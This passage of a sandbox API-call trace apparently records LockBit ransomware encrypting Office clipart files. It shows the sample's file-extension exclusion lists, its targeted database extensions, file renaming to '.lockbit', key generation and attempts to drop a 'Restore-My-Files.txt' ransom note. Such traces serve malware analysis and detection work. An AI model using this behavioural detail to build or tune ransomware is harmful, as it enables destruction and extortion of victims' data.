[0102.629] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.630] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.631] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.631] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04108_.WMF") returned 1 [0102.632] lstrcmpiW (lpString1="ntldr", lpString2="AN04108_.WMF") returned 1 [0102.632] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04108_.WMF") returned 1 [0102.632] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04108_.WMF") returned 1 [0102.632] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04108_.WMF") returned 1 [0102.632] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04108_.WMF") returned 1 [0102.632] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04108_.WMF") returned 1 [0102.632] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.632] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned=".WMF" [0102.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.632] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.632] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.633] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.634] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.634] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.634] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.634] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.634] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.lockbit") returned 72 [0102.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.634] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.634] malloc (_Size=0x40068) returned 0x3ef0008 [0102.634] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2344) returned 1 [0102.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.635] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.635] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0102.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0102.636] ReadFile (in: hFile=0xf00, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0102.665] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.665] malloc (_Size=0xa6) returned 0x77d800 [0102.665] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.666] free (_Block=0x77d800) [0102.666] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.666] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.666] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x17ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04117_.WMF", cAlternateFileName="")) returned 1 [0102.666] lstrcmpiW (lpString1=".", lpString2="AN04117_.WMF") returned -1 [0102.666] lstrcmpiW (lpString1="..", lpString2="AN04117_.WMF") returned -1 [0102.666] PathFindExtensionW (pszPath="AN04117_.WMF") returned=".WMF" [0102.666] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.666] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.666] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.666] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.666] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.666] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.667] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.670] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.670] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04117_.WMF") returned 1 [0102.671] lstrcmpiW (lpString1="ntldr", lpString2="AN04117_.WMF") returned 1 [0102.671] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04117_.WMF") returned 1 [0102.671] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04117_.WMF") returned 1 [0102.671] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04117_.WMF") returned 1 [0102.671] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04117_.WMF") returned 1 [0102.671] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04117_.WMF") returned 1 [0102.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned=".WMF" [0102.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.671] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.671] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.672] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.672] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.lockbit") returned 72 [0102.672] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c8 [0102.673] CreateIoCompletionPort (FileHandle=0x13c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.673] malloc (_Size=0x40068) returned 0x3e30078 [0102.673] GetFileSizeEx (in: hFile=0x13c8, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=6060) returned 1 [0102.673] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0102.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.674] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0102.674] ReadFile (in: hFile=0x13c8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0102.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.722] malloc (_Size=0xa6) returned 0x77d800 [0102.722] NtSetInformationFile (FileHandle=0x13c8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.723] free (_Block=0x77d800) [0102.723] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.723] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.724] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04134_.WMF", cAlternateFileName="")) returned 1 [0102.724] lstrcmpiW (lpString1=".", lpString2="AN04134_.WMF") returned -1 [0102.724] lstrcmpiW (lpString1="..", lpString2="AN04134_.WMF") returned -1 [0102.724] PathFindExtensionW (pszPath="AN04134_.WMF") returned=".WMF" [0102.724] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.724] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.725] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.725] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.726] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04134_.WMF") returned 1 [0102.726] lstrcmpiW (lpString1="ntldr", lpString2="AN04134_.WMF") returned 1 [0102.726] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04134_.WMF") returned 1 [0102.726] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04134_.WMF") returned 1 [0102.726] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04134_.WMF") returned 1 [0102.726] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04134_.WMF") returned 1 [0102.726] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04134_.WMF") returned 1 [0102.726] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.726] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned=".WMF" [0102.726] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.727] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.727] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.729] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.729] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.lockbit") returned 72 